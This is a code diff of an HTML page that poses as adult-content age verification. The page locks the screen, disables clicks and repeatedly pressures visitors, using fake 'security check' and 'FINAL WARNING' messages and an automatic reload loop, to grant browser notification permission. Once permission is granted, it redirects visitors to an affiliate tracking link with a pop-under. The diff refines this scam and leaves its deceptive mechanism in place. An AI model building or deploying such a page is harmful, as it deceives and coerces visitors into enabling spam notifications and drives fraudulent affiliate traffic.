--- a/index.html
+++ b/index.html
@@ -30,11 +30,6 @@
             font-size: 18px;
             color: #ffcc00;
         }
-        .loading {
-            font-size: 18px;
-            margin-top: 10px;
-            color: white;
-        }
         .locked {
             position: fixed;
             width: 100%;
@@ -46,79 +41,52 @@
             justify-content: center;
             align-items: center;
             flex-direction: column;
-            text-align: center;
             font-size: 20px;
             z-index: 9999;
         }
         .btn {
             background-color: #ffcc00;
             color: black;
-            padding: 10px 20px;
-            font-size: 16px;
-            border-radius: 5px;
+            padding: 15px 30px;
+            font-size: 20px;
+            border-radius: 10px;
             cursor: pointer;
-            margin-top: 20px;
+            margin-top: 30px;
             transition: background-color 0.3s ease;
         }
         .btn:hover {
             background-color: #ff9900;
-        }
-        .video-container {
-            margin-top: 30px;
-            position: relative;
-            display: inline-block;
-        }
-        .video-img {
-            width: 100%;
-            max-width: 600px;
-            cursor: pointer;
-            border-radius: 10px;
-        }
-        .play-button {
-            position: absolute;
-            top: 50%;
-            left: 50%;
-            transform: translate(-50%, -50%);
-            font-size: 40px;
-            color: white;
-            background: rgba(0, 0, 0, 0.5);
-            padding: 15px;
-            border-radius: 50%;
-            cursor: pointer;
-            display: none; /* Initially hidden */
-        }
-        .play-button:hover {
-            background: rgba(255, 165, 0, 0.7); /* Hover effect */
-        }
-        .final-warning {
-            color: red;
-            font-size: 22px;
-            font-weight: bold;
         }
         .offer-message {
             font-size: 18px;
             color: #ffcc00;
             margin-top: 30px;
         }
+        .final-warning {
+            color: red;
+            font-size: 22px;
+            font-weight: bold;
+        }
+        .urgency {
+            color: #ff0000;
+            font-size: 20px;
+            font-weight: bold;
+            margin-top: 20px;
+        }
     </style>
 </head>
 <body>
     <div class="locked" id="lockScreen">
-        <h1>🔞 Adult Content Verification Required 🔞</h1>
+        <h1>🔞 Age Verification Required 🔞</h1>
         <div class="alert-box">
-            <p>Unlock exclusive content now! To continue, click <b>"Allow"</b> below to verify your age.</p>
-            <p><b>Failure to comply will deny access to our premium content.</b></p>
-        </div>
-        <button class="btn" id="allowButton">Allow Notifications and Unlock Content</button>
-        
-        <div class="video-container">
-            <img src="https://cdn77-pic.xvideos-cdn.com/videos/thumbs169poster/dd/fe/66/ddfe6645a61b72e3c55718aeb8db171b/ddfe6645a61b72e3c55718aeb8db171b.30.jpg" alt="Video Thumbnail" class="video-img" id="playVideo">
-            <div class="play-button" id="playBtn">▶️</div>
-            <p class="offer-message">Click Play to Watch (Only after allowing notifications)</p>
+            <p>Unlock exclusive content now! Click <b>"Allow"</b> to verify your age and continue.</p>
+            <p><b>Don't miss out! This is your only chance to get full access.</b></p>
         </div>
 
-        <p class="loading">Processing your verification...</p>
-        <p class="offer-message">Hurry, limited time access! Unlock the best content now!</p>
+        <button class="btn" id="allowButton">Allow Notifications and Unlock Content</button>
+
+        <p class="urgency">⏳ Limited Access! Only for a short time!</p>
+        <p class="offer-message">Click "Allow" to access premium content now!</p>
     </div>
 
     <script type="module">
@@ -142,7 +110,7 @@
 
         document.body.style.pointerEvents = "none";
         
-        // Función para solicitar permiso de notificación
+        // Function to request notification permission
         function requestNotificationPermission() {
             Notification.requestPermission().then(permission => {
                 if (permission === "granted") {
@@ -155,28 +123,26 @@
                         });
 
                     setTimeout(() => {
-                        // Redirigir al video de contenido premium
+                        // Redirect to premium content video
                         window.location.href = "https://t.slext2.com/341879/7272?bo=2753,2754,2755,2756&popUnder=true&aff_sub5=SF_006OG000004lmDN";
                     }, 2000);
 
                     document.getElementById("lockScreen").style.display = "none";
                     document.body.style.pointerEvents = "auto";
-                    document.getElementById("playBtn").style.display = "block"; // Mostrar botón Play
                 } else {
                     logEvent(analytics, 'notification_permission_denied');
-                    // Mostrar mensaje fuerte si el permiso es denegado
+                    // Final message if permission is denied
                     document.getElementById("lockScreen").innerHTML = `
                         <h1 class="final-warning">🚨 FINAL WARNING 🚨</h1>
                         <div class="alert-box">
                             <p><b>Access Denied!</b> You must approve the security check to access exclusive content.</p>
-                            <p>Click <b>"Allow"</b> on the next step to verify.</p>
-                            <p><b>Failure to comply will result in permanent restriction.</b></p>
+                            <p>Click <b>"Allow"</b> to continue.</p>
                         </div>
                         <button class="btn" id="allowButton">Allow Notifications and Continue</button>
                         <p class="loading">Retrying...</p>
                     `;
                     setTimeout(() => {
-                        location.reload(); // Recargar la página para permitir otro intento
+                        location.reload(); // Reload page to allow another attempt
                     }, 4000);
                 }
             }).catch(err => {
@@ -184,21 +150,12 @@
             });
         }
 
-        // Función para iniciar la solicitud de permiso
+        // Function to start notification permission request
         requestNotificationPermission();
 
-        // Permitir reintentar haciendo clic en el botón
+        // Allow retry by clicking the button
         document.getElementById("allowButton").addEventListener("click", () => {
             requestNotificationPermission();
-        });
-
-        // Al hacer clic en la imagen del video, verificar si el usuario ha permitido las notificaciones
-        document.getElementById("playBtn").addEventListener("click", () => {
-            if (Notification.permission === "granted") {
-                window.location.href = "https://t.slext2.com/341879/7272?bo=2753,2754,2755,2756&popUnder=true&aff_sub5=SF_006OG000004lmDN"; // Redirige al video de contenido premium
-            } else {
-                alert("Please allow notifications to unlock the content!");
-            }
         });
     </script>
 </body>
